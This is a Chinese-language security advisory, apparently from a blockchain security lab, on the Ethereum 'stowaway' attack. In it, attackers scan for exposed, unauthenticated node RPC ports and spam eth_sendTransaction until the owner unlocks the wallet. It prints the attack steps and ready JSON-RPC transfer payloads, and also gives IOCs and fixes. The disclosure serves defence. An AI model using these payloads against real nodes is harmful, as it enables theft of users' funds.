世界上有一羣人,互聯網對於他們來說就是提款機。
是的,過去是,現在更是,因爲電子貨幣的出現,他們提款的速度變得更瘋狂。
在 2017 年,我們的蜜罐監測到一起針對以太坊的全球大規模攻擊事件,我們將其命名爲以太坊“偷渡”漏洞。
通過該漏洞,黑客可以在沒有服務器權限、沒有 keystore 密碼權限的情況下,轉走錢包中的所有餘額。
而如此嚴重的漏洞,1 年前就在 reddit.com 被曝光有黑客在利用,並且最早可追溯到 2016 年的 2 月 14 號就有黑客通過此漏洞竊取到比特幣:
(https://www.reddit.com/r/ethereum/comments/4z0 mvi/ethereum_nodes_with_insecure_rpc_settings_are/)
近期也有中國的慢霧安全團隊揭露了這種攻擊手法:
(https://mp.weixin.qq.com/s/Kk2lsoQ1679Gda56Ec-zJg)
在長達 2 年的時間裏,並沒有多少用戶關注到,以太坊也沒有進行鍼對性的防護措施,直到今日,以太坊的最新代碼中依然沒有能夠抵禦這種攻擊。
因此我們決定將我們所掌握的詳細數據公佈給所有人,希望能促使以太坊的開發者承認並修復該漏洞。
漏洞成因
(以下的代碼分析基於 https://github.com/ethereum/go-ethereum 的當前最新提交:commit b1917ac9a3cf4716460bd53a11db40384103e5e2)
以太坊目前最流行的節點程序(Geth/Parity )都提供了 RPC API,用於對接礦池、錢包等其他第三方程序。
默認情況下,節點的 RPC 服務是無需密碼就可以進行接口調用,官方實現的 RPC API 也並未提供設置 RPC 連接密碼的功能,因此,一旦將 RPC 端口暴露在互聯網,將會非常危險。
而我們所捕獲的以太坊“偷渡”漏洞,正是利用了以太坊默認對 RPC 不做鑑權的設計。
被攻擊的用戶,需要具備以下條件:
- 節點的 RPC 端口對外開放
- 節點的 RPC 端口可直接調用 API,未做額外的鑑權保護(如通過 nginx 等方式進行鑑權保護)
- 節點的區塊高度已經同步到網絡的最新高度,因爲需要在該節點進行轉賬,如果未達到最高度,無法進行轉賬
當用戶對自己的錢包進行了解鎖(unlockAccount 函數),在解鎖超時期間,無需再輸入密碼,便可調用 RPC
API 的 eth_sendTransaction 進行轉賬操作。
漏洞的關鍵組成,由未鑑權的 RPC API 服務及解鎖賬戶後有一定的免密碼時間相結合,以下是解鎖賬戶的 unlockAccount 函數:
代碼路徑:go-ethereum/internal/jsre/deps/api.go
通過函數的實現代碼可見,解鎖賬戶的 api 允許傳入超時時間,默認超時爲 300 秒,
真正進行解鎖的函數 TimedUnlock 實現如下:
代碼路徑:go-ethereum/accounts/keystore/keystore.go
當傳入的超時大於 0 時,會發起一個協程進行超時處理,如果傳入的超時時間爲 0,則是永久不會超時,賬戶一直處於解鎖狀態,直到節點進程退出。
詳細的用法參考官方文檔:https://github.com/ethereum/go-ethereum/wiki/Management-APIs#personal_unlockaccount
攻擊手法揭祕
1. 尋找對外開放以太坊 RPC 端口的服務器,確認節點已經達到以太坊網絡的最高區塊高度
黑客通過全球的端口服務掃描,發現 RPC 服務爲以太坊的 RPC 接口時,調用 eth_getBlockByNumber(‘last’,false),獲取最新的區塊高度。
但是由於有些以太節點是以太坊的分叉幣,高度與以太坊的不一樣,因此黑客即使發現節點高度與以太坊的高度不一樣,也不會放棄攻擊。
2. 調用 eth_accounts,獲取該節點上的所有賬戶。
eth_accounts 的請求將返回一個賬戶地址列表:[0x1834axxxxxxxxxxxxxxxxxxxxxxxxxxx,0xa13jkcxxxxxxxxxxxxxxxxxxxxxxxxxxx,…… ]
3. 調用 eth_getBalance,查詢地址餘額。
這個過程黑客可在自己的服務器完成以太坊的餘額查詢,因爲以太坊的區塊鏈賬本數據庫是隨意公開獲取的。
有部分黑客沒有搭建以太坊的全節點,沒有自行查詢餘額,因此也會在被攻擊服務器進行 eth_getBalance 操作。
4. 持續調用轉賬操作,直到剛好用戶用密碼解鎖了錢包,完成非法轉賬操作的“偷渡”
黑客會構造 eth_sendTransaction 的轉賬操作,並填寫餘額、固定的手續費:
{“jsonrpc”:”2.0″,”id”:2,”method”:”eth_sendTransaction”,”params”:[{“from”:”受害者錢包地址 1″,”gas”:”0x55f0″,”to”:”0xdc3431d42c0bf108b44cb48bfbd2cd4d392c32d6″,”value”:”0x112345fc212345000″}]}
{“jsonrpc”:”2.0″,”id”:2,”method”:”eth_sendTransaction”,”params”:[{“from”:”受害者錢包地址 2″,”gas”:”0x55f0″,”to”:”0xdc3431d42c0bf108b44cb48bfbd2cd4d392c32d6″,”value”:”0x112345fc212345000″}]}
{“jsonrpc”:”2.0″,”id”:2,”method”:”eth_sendTransaction”,”params”:[{“from”:”受害者錢包地址 3″,”gas”:”0x55f0″,”to”:”0xdc3431d42c0bf108b44cb48bfbd2cd4d392c32d6″,”value”:”0x112345fc212345000″}]}
其中的 value 的單位是以太的最小單位:wei,計算爲以太的話需要除 10 的 18 次方:
0x112345fc212345000
19758522752314920960L
19758522752314920960L/1000000000000000000
19L
黑客會持續發轉賬操作,並定期監控餘額變化,更新轉賬的金額,直到用戶使用錢包,輸入密碼解鎖了錢包,此時錢包餘額會立即被轉走。
快速漏洞測試
安裝 python 的 web3 庫,然後連接 RPC 端口,發起請求,如果獲取到返回結果,便可能存在該漏洞。
參考:http://web3py.readthedocs.io/en/stable/quickstart.html
from web3 import Web3, HTTPProvider, IPCProvider
web3 = Web3(HTTPProvider(‘http://ip:port’))
print web3.eth.blockNumber
黑客解密及 IOCs 情報
黑客錢包
目前我們掌握了 3 個黑客的錢包收款地址,未轉走的賬戶餘額爲 2220 萬美金:
https://etherscan.io/address/0x957cD4Ff9b3894FC78b5134A8DC72b032fFbC464,餘額爲 38,076 ETH (未統計 erc20 token),最早進賬爲 2016-2-14,最新進賬爲 2018-3-21 (當前還在持續入賬)
https://etherscan.io/address/0x96a5296eb1d8f8098d35f300659c95f7d6362d15,餘額爲 321 ETH (未統計 erc20 token),最早進賬爲 2016-8-10,最新進賬爲 2017-11-28。
https://etherscan.io/address/0xdc3431d42c0bf108b44cb48bfbd2cd4d392c32d6,餘額爲 330 ETH (未統計 erc20 token),最早進賬爲 2018-2-06,最新進賬爲 2018-3-20。
黑客攻擊源 IP
146.0.249.87 (德國黑森州法蘭克福)
162.251.61.133 (加拿大)
190.2.133.114 (庫拉索)
85.14.240.84 (德國北萊茵)
目前大部分的黑客使用 https://github.com/regcostajr/go-web3 進行頻繁 API 請求,如果有看到大量 user-agent 爲
“Go-http-client/1.1”的 POST 請求時,請記錄下請求內容,確認是否爲惡意行爲。
緊急響應及修復建議
- 關閉對外暴露的 RPC 端口,如果必須暴露在互聯網,請使用鑑權:https://tokenmarket.net/blog/protecting-ethereum-json-rpc-api-with-password/
- 藉助防火牆等網絡防護軟件,封堵黑客攻擊源 IP
- 檢查 RPC 日誌、web 接口日誌,是否有異常大量的頻繁請求,檢查請求內容是否爲 eth_sendTransaction
- 等待以太坊更新最新代碼,使用修復了該漏洞的節點程序
文章來源:BLS 區塊鏈安全實驗室
來源鏈接:www.gongxiangcj.com
繁體中文
简体中文
English
日本語
Español